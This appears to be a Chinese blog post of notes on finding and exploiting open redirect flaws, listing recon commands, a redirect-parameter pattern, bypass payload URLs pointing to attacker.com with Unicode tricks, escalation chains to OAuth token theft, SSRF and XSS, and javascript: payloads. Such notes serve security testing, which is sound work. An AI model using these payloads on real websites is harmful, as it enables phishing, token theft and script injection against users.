• url跳转挖掘


    https://0x00sec.org/t/open-redirection-guide/21118

    工具都是go语言的,不太会用,留个坑

    Identifing possible vulnerable endpoints:

    • waybackurls 10 + hakrawler 9 + gf 11

      1cat subdomains | waybackurls | tee -a urls
      2cat subdomains | hakrawler -depth 3 -plain | tee -a urls
      3gf redirect urls

      using redirect.json with gf:

    {
        "flags" : "-HanrE",
        "pattern" : "url=|rt=|cgi-bin/redirect.cgi|continue=|dest=|destination=|go=|out=|redir=|redirect_uri=|redirect_url=|return=|return_path=|returnTo=|rurl=|target=|view=|from_url=|load_url=|file_url=|page_url=|file_name=|page=|folder=|folder_url=|login_url=|img_url=|return_url=|return_to=|next=|redirect=|redirect_to=|logout=|checkout=|checkout_url=|goto=|next_page=|file=|load_file="
    }
    
    • Google dorks
      site:domain.com inurl:[PARAMETER] using a parameter list 21
    • Manual inspection by navigating the webapp and intercepting the requests

    Confirm and exploit:

    * https://company.com/?redirect=http://attacker.com
    * https://company.com/?redirect=http://company.com.attacker.com
    * https://company.com/?redirect=https://company.com@attacker.com
    * https://company.com/?redirect=//attacker.com
    * https://company.com/?redirect=http://attacker.com#company.com
    * https://company.com/?redirect=http://attacker.com?company.com
    * https://company.com/?redirect=http://attacker.com/company.com
    * https://company.com/?redirect=http://ⓐⓣⓣⓐⓒⓚⓔⓡ.ⓒⓞⓜ
    
    Using special characters:
    ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ 
    ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ 
    ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ 
    ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ 
    Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ 
    ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ 
    ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ 。
    

    Special characters’ source 4

    Escalating to other vulnerabilities:

    Open Redirect + Miconfigured OAuth App => OAuth Token Stealing
    Open Redirect + Filtered SSRF => SSRF
    Open Redirect + CRLFi => XSS
    Open Redirect + javascript URI => XSS
    

    Source 4

    Escalate to XSS

    • https://company.com/?redirect=javascript:alert(1)
    • https://company.com/?redirect=javascript:prompt(1)

    Escalate to XSS using CRLFi

  • 相关阅读:
    ComboBoxEdit 数据绑定 使用模板
    ObservableCollection
    ListView.MouseDoubleClick
    Style 的查找 FindResource
    OpenFileDialog
    ItemsControl
    下拉框比较符
    ListView 控件与 内容
    测试oracle数据库连接
    MySQL ERROR 1300 (HY000): Invalid utf8 character string
  • 原文地址:https://www.cnblogs.com/ahacker15/p/13065571.html
Copyright © 2020-2023  润新知